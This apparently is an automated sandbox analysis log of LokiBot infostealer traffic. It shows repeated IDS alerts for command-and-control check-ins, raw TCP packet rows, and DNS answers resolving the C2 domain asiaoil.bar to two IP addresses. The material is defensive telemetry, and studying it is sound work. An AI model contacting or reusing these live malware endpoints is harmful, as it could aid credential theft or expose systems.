                    02/10/22-10:22:54.210618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.22172.67.197.66
                    02/10/22-10:22:54.210618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.22172.67.197.66
                    02/10/22-10:22:54.210618TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.22172.67.197.66
                    02/10/22-10:22:54.210618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.22172.67.197.66
                    02/10/22-10:22:55.222618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.22172.67.197.66
                    02/10/22-10:22:55.222618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.22172.67.197.66
                    02/10/22-10:22:55.222618TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.22172.67.197.66
                    02/10/22-10:22:55.222618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.22172.67.197.66
                    02/10/22-10:22:56.235040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.22172.67.197.66
                    02/10/22-10:22:56.235040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.22172.67.197.66
                    02/10/22-10:22:56.235040TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.22172.67.197.66
                    02/10/22-10:22:56.235040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.22172.67.197.66
                    02/10/22-10:22:57.354640TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.22172.67.197.66
                    02/10/22-10:22:57.354640TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.22172.67.197.66
                    02/10/22-10:22:57.354640TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.22172.67.197.66
                    02/10/22-10:22:57.354640TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.22172.67.197.66
                    02/10/22-10:22:58.437792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.22172.67.197.66
                    02/10/22-10:22:58.437792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.22172.67.197.66
                    02/10/22-10:22:58.437792TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.22172.67.197.66
                    02/10/22-10:22:58.437792TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.22172.67.197.66
                    02/10/22-10:22:59.543743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.22172.67.197.66
                    02/10/22-10:22:59.543743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.22172.67.197.66
                    02/10/22-10:22:59.543743TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.22172.67.197.66
                    02/10/22-10:22:59.543743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.22172.67.197.66
                    02/10/22-10:23:00.557397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.22172.67.197.66
                    02/10/22-10:23:00.557397TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.22172.67.197.66
                    02/10/22-10:23:00.557397TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.22172.67.197.66
                    02/10/22-10:23:00.557397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.22172.67.197.66
                    02/10/22-10:23:01.628313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.22172.67.197.66
                    02/10/22-10:23:01.628313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.22172.67.197.66
                    02/10/22-10:23:01.628313TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.22172.67.197.66
                    02/10/22-10:23:01.628313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.22172.67.197.66
                    02/10/22-10:23:02.628100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.22172.67.197.66
                    02/10/22-10:23:02.628100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.22172.67.197.66
                    02/10/22-10:23:02.628100TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.22172.67.197.66
                    02/10/22-10:23:02.628100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.22172.67.197.66
                    02/10/22-10:23:03.670597TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.22104.21.49.244
                    02/10/22-10:23:03.670597TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.22104.21.49.244
                    02/10/22-10:23:03.670597TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.22104.21.49.244
                    02/10/22-10:23:03.670597TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.22104.21.49.244
                    02/10/22-10:23:04.661405TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.22104.21.49.244
                    02/10/22-10:23:04.661405TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.22104.21.49.244
                    02/10/22-10:23:04.661405TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.22104.21.49.244
                    02/10/22-10:23:04.661405TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.22104.21.49.244
                    02/10/22-10:23:05.954620TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.22172.67.197.66
                    02/10/22-10:23:05.954620TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.22172.67.197.66
                    02/10/22-10:23:05.954620TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.22172.67.197.66
                    02/10/22-10:23:05.954620TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.22172.67.197.66
                    02/10/22-10:23:08.596978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.22172.67.197.66
                    02/10/22-10:23:08.596978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.22172.67.197.66
                    02/10/22-10:23:08.596978TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.22172.67.197.66
                    02/10/22-10:23:08.596978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.22172.67.197.66
                    02/10/22-10:23:09.667688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.22172.67.197.66
                    02/10/22-10:23:09.667688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.22172.67.197.66
                    02/10/22-10:23:09.667688TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.22172.67.197.66
                    02/10/22-10:23:09.667688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.22172.67.197.66
                    02/10/22-10:23:10.711121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.22172.67.197.66
                    02/10/22-10:23:10.711121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922780192.168.2.22172.67.197.66
                    02/10/22-10:23:10.711121TCP2025381ET TROJAN LokiBot Checkin4922780192.168.2.22172.67.197.66
                    02/10/22-10:23:10.711121TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922780192.168.2.22172.67.197.66
                    02/10/22-10:23:11.750459TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922880192.168.2.22172.67.197.66
                    02/10/22-10:23:11.750459TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922880192.168.2.22172.67.197.66
                    02/10/22-10:23:11.750459TCP2025381ET TROJAN LokiBot Checkin4922880192.168.2.22172.67.197.66
                    02/10/22-10:23:11.750459TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922880192.168.2.22172.67.197.66
                    02/10/22-10:23:12.826739TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922980192.168.2.22172.67.197.66
                    02/10/22-10:23:12.826739TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922980192.168.2.22172.67.197.66
                    02/10/22-10:23:12.826739TCP2025381ET TROJAN LokiBot Checkin4922980192.168.2.22172.67.197.66
                    02/10/22-10:23:12.826739TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922980192.168.2.22172.67.197.66
                    02/10/22-10:23:13.916425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923080192.168.2.22172.67.197.66
                    02/10/22-10:23:13.916425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923080192.168.2.22172.67.197.66
                    02/10/22-10:23:13.916425TCP2025381ET TROJAN LokiBot Checkin4923080192.168.2.22172.67.197.66
                    02/10/22-10:23:13.916425TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923080192.168.2.22172.67.197.66
                    02/10/22-10:23:14.928309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923180192.168.2.22104.21.49.244
                    02/10/22-10:23:14.928309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923180192.168.2.22104.21.49.244
                    02/10/22-10:23:14.928309TCP2025381ET TROJAN LokiBot Checkin4923180192.168.2.22104.21.49.244
                    02/10/22-10:23:14.928309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923180192.168.2.22104.21.49.244
                    02/10/22-10:23:16.169339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923280192.168.2.22172.67.197.66
                    02/10/22-10:23:16.169339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923280192.168.2.22172.67.197.66
                    02/10/22-10:23:16.169339TCP2025381ET TROJAN LokiBot Checkin4923280192.168.2.22172.67.197.66
                    02/10/22-10:23:16.169339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923280192.168.2.22172.67.197.66
                    02/10/22-10:23:17.425743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923480192.168.2.22104.21.49.244
                    02/10/22-10:23:17.425743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923480192.168.2.22104.21.49.244
                    02/10/22-10:23:17.425743TCP2025381ET TROJAN LokiBot Checkin4923480192.168.2.22104.21.49.244
                    02/10/22-10:23:17.425743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923480192.168.2.22104.21.49.244
                    02/10/22-10:23:18.783854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923580192.168.2.22104.21.49.244
                    02/10/22-10:23:18.783854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923580192.168.2.22104.21.49.244
                    02/10/22-10:23:18.783854TCP2025381ET TROJAN LokiBot Checkin4923580192.168.2.22104.21.49.244
                    02/10/22-10:23:18.783854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923580192.168.2.22104.21.49.244
                    02/10/22-10:23:19.840840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923680192.168.2.22172.67.197.66
                    02/10/22-10:23:19.840840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923680192.168.2.22172.67.197.66
                    02/10/22-10:23:19.840840TCP2025381ET TROJAN LokiBot Checkin4923680192.168.2.22172.67.197.66
                    02/10/22-10:23:19.840840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923680192.168.2.22172.67.197.66
                    02/10/22-10:23:20.970687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923780192.168.2.22172.67.197.66
                    02/10/22-10:23:20.970687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923780192.168.2.22172.67.197.66
                    02/10/22-10:23:20.970687TCP2025381ET TROJAN LokiBot Checkin4923780192.168.2.22172.67.197.66
                    02/10/22-10:23:20.970687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923780192.168.2.22172.67.197.66
                    02/10/22-10:23:22.072758TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923880192.168.2.22172.67.197.66
                    02/10/22-10:23:22.072758TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923880192.168.2.22172.67.197.66
                    02/10/22-10:23:22.072758TCP2025381ET TROJAN LokiBot Checkin4923880192.168.2.22172.67.197.66
                    02/10/22-10:23:22.072758TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923880192.168.2.22172.67.197.66
                    02/10/22-10:23:23.139723TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923980192.168.2.22172.67.197.66
                    02/10/22-10:23:23.139723TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923980192.168.2.22172.67.197.66
                    02/10/22-10:23:23.139723TCP2025381ET TROJAN LokiBot Checkin4923980192.168.2.22172.67.197.66
                    02/10/22-10:23:23.139723TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923980192.168.2.22172.67.197.66
                    02/10/22-10:23:25.193411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924080192.168.2.22172.67.197.66
                    02/10/22-10:23:25.193411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924080192.168.2.22172.67.197.66
                    02/10/22-10:23:25.193411TCP2025381ET TROJAN LokiBot Checkin4924080192.168.2.22172.67.197.66
                    02/10/22-10:23:25.193411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924080192.168.2.22172.67.197.66
                    02/10/22-10:23:26.759435TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924180192.168.2.22104.21.49.244
                    02/10/22-10:23:26.759435TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924180192.168.2.22104.21.49.244
                    02/10/22-10:23:26.759435TCP2025381ET TROJAN LokiBot Checkin4924180192.168.2.22104.21.49.244
                    02/10/22-10:23:26.759435TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924180192.168.2.22104.21.49.244
                    02/10/22-10:23:27.802325TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924280192.168.2.22104.21.49.244
                    02/10/22-10:23:27.802325TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924280192.168.2.22104.21.49.244
                    02/10/22-10:23:27.802325TCP2025381ET TROJAN LokiBot Checkin4924280192.168.2.22104.21.49.244
                    02/10/22-10:23:27.802325TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924280192.168.2.22104.21.49.244
                    02/10/22-10:23:28.801702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924380192.168.2.22172.67.197.66
                    02/10/22-10:23:28.801702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924380192.168.2.22172.67.197.66
                    02/10/22-10:23:28.801702TCP2025381ET TROJAN LokiBot Checkin4924380192.168.2.22172.67.197.66
                    02/10/22-10:23:28.801702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924380192.168.2.22172.67.197.66
                    02/10/22-10:23:29.791359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924480192.168.2.22172.67.197.66
                    02/10/22-10:23:29.791359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924480192.168.2.22172.67.197.66
                    02/10/22-10:23:29.791359TCP2025381ET TROJAN LokiBot Checkin4924480192.168.2.22172.67.197.66
                    02/10/22-10:23:29.791359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924480192.168.2.22172.67.197.66
                    02/10/22-10:23:30.804451TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924580192.168.2.22172.67.197.66
                    02/10/22-10:23:30.804451TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924580192.168.2.22172.67.197.66
                    02/10/22-10:23:30.804451TCP2025381ET TROJAN LokiBot Checkin4924580192.168.2.22172.67.197.66
                    02/10/22-10:23:30.804451TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924580192.168.2.22172.67.197.66
                    02/10/22-10:23:31.841168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924680192.168.2.22172.67.197.66
                    02/10/22-10:23:31.841168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924680192.168.2.22172.67.197.66
                    02/10/22-10:23:31.841168TCP2025381ET TROJAN LokiBot Checkin4924680192.168.2.22172.67.197.66
                    02/10/22-10:23:31.841168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924680192.168.2.22172.67.197.66
                    02/10/22-10:23:32.863722TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924780192.168.2.22172.67.197.66
                    02/10/22-10:23:32.863722TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924780192.168.2.22172.67.197.66
                    02/10/22-10:23:32.863722TCP2025381ET TROJAN LokiBot Checkin4924780192.168.2.22172.67.197.66
                    02/10/22-10:23:32.863722TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924780192.168.2.22172.67.197.66
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Feb 10, 2022 10:21:50.610606909 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610723972 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610761881 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610779047 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610796928 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610820055 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610820055 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610835075 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610847950 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610851049 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610867977 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610887051 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610889912 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610899925 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610913038 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610928059 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610934973 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610943079 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610970020 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.611434937 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614706993 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614736080 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614754915 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614767075 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614779949 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614790916 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614793062 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614804983 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614820957 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614828110 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614845991 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614851952 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614866018 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614871979 CET8049165198.46.132.195192.168.2.22
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                    Feb 10, 2022 10:22:20.282020092 CET8.8.8.8192.168.2.220x795eNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:21.349742889 CET8.8.8.8192.168.2.220xeeebNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:21.349742889 CET8.8.8.8192.168.2.220xeeebNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:22.469295979 CET8.8.8.8192.168.2.220xe527No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:22.469295979 CET8.8.8.8192.168.2.220xe527No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:23.484388113 CET8.8.8.8192.168.2.220xfad8No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:23.484388113 CET8.8.8.8192.168.2.220xfad8No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:24.567791939 CET8.8.8.8192.168.2.220xc89cNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:24.567791939 CET8.8.8.8192.168.2.220xc89cNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:25.572346926 CET8.8.8.8192.168.2.220xe031No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:25.572346926 CET8.8.8.8192.168.2.220xe031No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:26.651072025 CET8.8.8.8192.168.2.220x61b1No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:26.651072025 CET8.8.8.8192.168.2.220x61b1No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:27.667135954 CET8.8.8.8192.168.2.220xe5e0No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:27.667135954 CET8.8.8.8192.168.2.220xe5e0No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:29.064960003 CET8.8.8.8192.168.2.220x1048No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:29.064960003 CET8.8.8.8192.168.2.220x1048No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:30.776675940 CET8.8.8.8192.168.2.220x5557No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:30.776675940 CET8.8.8.8192.168.2.220x5557No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:31.858690977 CET8.8.8.8192.168.2.220x74efNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:31.858690977 CET8.8.8.8192.168.2.220x74efNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:32.930648088 CET8.8.8.8192.168.2.220x14c8No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:32.930648088 CET8.8.8.8192.168.2.220x14c8No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:33.985292912 CET8.8.8.8192.168.2.220x860fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:33.985292912 CET8.8.8.8192.168.2.220x860fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:35.035057068 CET8.8.8.8192.168.2.220xfea3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:35.035057068 CET8.8.8.8192.168.2.220xfea3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:36.052189112 CET8.8.8.8192.168.2.220x2516No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:36.052189112 CET8.8.8.8192.168.2.220x2516No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:37.097563982 CET8.8.8.8192.168.2.220xff8aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:37.097563982 CET8.8.8.8192.168.2.220xff8aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:38.148770094 CET8.8.8.8192.168.2.220x7ac5No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:38.148770094 CET8.8.8.8192.168.2.220x7ac5No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:39.203105927 CET8.8.8.8192.168.2.220xb649No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:39.203105927 CET8.8.8.8192.168.2.220xb649No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:40.399499893 CET8.8.8.8192.168.2.220x55b7No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:40.399499893 CET8.8.8.8192.168.2.220x55b7No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:41.416198015 CET8.8.8.8192.168.2.220x9913No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:41.416198015 CET8.8.8.8192.168.2.220x9913No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:42.509901047 CET8.8.8.8192.168.2.220xd5cfNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:42.509901047 CET8.8.8.8192.168.2.220xd5cfNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:43.524178982 CET8.8.8.8192.168.2.220xe474No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:43.524178982 CET8.8.8.8192.168.2.220xe474No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:44.563961983 CET8.8.8.8192.168.2.220xd627No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:44.563961983 CET8.8.8.8192.168.2.220xd627No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:45.620157957 CET8.8.8.8192.168.2.220xffb2No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:45.620157957 CET8.8.8.8192.168.2.220xffb2No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:46.698565960 CET8.8.8.8192.168.2.220x24d3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:46.698565960 CET8.8.8.8192.168.2.220x24d3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:47.712665081 CET8.8.8.8192.168.2.220x664bNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:47.712665081 CET8.8.8.8192.168.2.220x664bNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:48.813474894 CET8.8.8.8192.168.2.220xc7a4No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:48.813474894 CET8.8.8.8192.168.2.220xc7a4No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:49.878983974 CET8.8.8.8192.168.2.220x3468No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:49.878983974 CET8.8.8.8192.168.2.220x3468No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:51.019309044 CET8.8.8.8192.168.2.220xfa95No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:51.019309044 CET8.8.8.8192.168.2.220xfa95No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:52.041841030 CET8.8.8.8192.168.2.220xd853No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:52.041841030 CET8.8.8.8192.168.2.220xd853No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:53.123905897 CET8.8.8.8192.168.2.220xc5beNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:53.123905897 CET8.8.8.8192.168.2.220xc5beNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:54.186261892 CET8.8.8.8192.168.2.220x412aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
